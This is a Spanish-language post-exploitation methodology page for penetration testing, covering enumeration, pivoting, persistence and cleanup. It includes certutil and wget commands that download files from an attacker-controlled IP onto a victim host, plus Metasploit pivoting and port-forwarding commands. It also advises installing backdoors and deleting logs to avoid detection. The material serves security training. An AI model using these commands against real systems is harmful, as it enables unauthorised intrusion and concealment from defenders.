Skip to content

👑 Post-Explotación

Para no perdernos en el caos del sistema, seguimos esta ruta crítica:

✅ Metodología de Post-Explotación

1. Enumeración local (Reconocimiento del terreno)
2. Transferencia de archivos (Mover herramientas)
3. Mejora de la shell (Estabilización TTY)
4. Escalada de privilegios (Control total)
5. Persistencia (Asegurar el acceso)
6. Extracción de credenciales (Hashes y contraseñas)
7. Pivoting (Salto a otras redes)
8. Limpieza de huellas (Sigilo)

🔍 1. Enumeración Local

Lo primero es saber quiénes somos. No es lo mismo ser un servicio con pocos privilegios que un usuario con acceso a carpetas compartidas. Debemos identificar la arquitectura del sistema, usuarios activos y posibles vectores de escalada.

📂 2. Transferencia de Archivos

Estamos en casa ajena y sin herramientas. Para seguir con el pentest (ya sea escalada, enumeración o looting), puede que necesitamos transferirlas; lo más fácil es convertir tu máquina en un servidor temporal.

El servidor web de Python

Desde tu terminal de atacante, levantas un servicio en el puerto que prefieras. Esto permite que el objetivo pueda "ver" tus archivos y descargarlos.

bash
# Servidor en tu máquina (Atacante).
python -m SimpleHTTPServer <PORT>
python3 -m http.server <PORT> # Para Python3

Comandos de descarga

Una vez el servidor está arriba, usamos herramientas nativas del sistema víctima para traer el archivo.

En Windows (usando Certutil):

bash
certutil -urlcache -f http://<TU_IP>/<ARCHIVO> <NOMBRE_SALIDA>

En Linux (usando Wget):

bash
wget http://<TU_IP>/<ARCHIVO>

🐚 3. Mejora de la shell

Una shell precaria puede dificultar el trabajo. Para estabilizarla y obtener una terminal interactiva completa:

📈 4. Escalada de Privilegios

El objetivo final en cualquier máquina es el control total (root en Linux o SYSTEM en Windows).

Para ver los métodos específicos de cada sistema, consulta las guías correspondientes de Linux y Windows mencionadas arriba.

El objetivo final en cualquier máquina es el control total (root en Linux o SYSTEM en Windows).

⏳ 5. Persistencia

Imagina que logras entrar explotando una vulnerabilidad específica; si mañana el administrador parchea el sistema o actualiza el software, tu vía de entrada habrá desaparecido para siempre. Para evitar esto utilizamos la persistencia: el arte de instalar backdoors, configurar servicios o crear usuarios que nos aseguren el acceso al objetivo, incluso si el sistema se reinicia o nuestra sesión actual se interrumpe.

🔑 6. Extracción de Credenciales

Consiste en obtener hashes y contraseñas almacenadas en el sistema para realizar movimientos laterales o crackeo offline.

🌐 7. Pivoting (Movimiento Lateral)

Pivotar es usar una máquina ya comprometida para acceder a otras que no son visibles directamente desde el exterior. Es aquí donde la metodología se vuelve recursiva: al saltar a una nueva red, debemos empezar de nuevo desde el paso 1 (Enumeración).

Configuración del túnel (Metasploit)

Si utilizas Metasploit, primero debes indicar al framework cómo llegar a la red interna descubierta.

bash
run autoroute -s <red_interna/máscara>

Para usar herramientas externas (como Nmap o un navegador) a través de este túnel, necesitamos levantar un proxy SOCKS en Metasploit (auxiliary/server/socks_proxy) y configurar Proxychains en nuestra máquina.

bash
# Ejemplo de escaneo a través del proxy
proxychains nmap -Pn -sT <IP_INTERNA>

💡 Tip de Nmap con Proxychains

Es obligatorio usar los flags -Pn (para evitar el ping, que suele fallar en proxies) y -sT (para forzar un escaneo TCP completo), ya que los proxies SOCKS no suelen gestionar paquetes ICMP o SYN de forma transparente.

Descubrimiento de red

Si ya tienes privilegios en la máquina puente, puedes realizar un escaneo ARP para identificar otros equipos vivos en la subred interna sin necesidad de ruidos innecesarios.

bash
# Ejemplo para Windows desde Meterpreter
run post/windows/gather/arp_scanner RHOSTS=10.2.16.0/20

Port Forwarding

Si solo necesitas interactuar con un servicio específico de una IP interna, el "Port Forwarding" es la opción más limpia. Traes un puerto remoto a un puerto de tu propio localhost.

bash
portfwd add -l <PUERTO_LOCAL> -p <PUERTO_REMOTO> -r <IP_OBJETIVO>

🧹 8. Limpieza de Huellas

Es fundamental borrar el rastro de nuestra actividad (logs, archivos temporales y herramientas subidas) para evitar ser detectados.

Sin copyright ni nada. Ház lo que quieras con todo esto.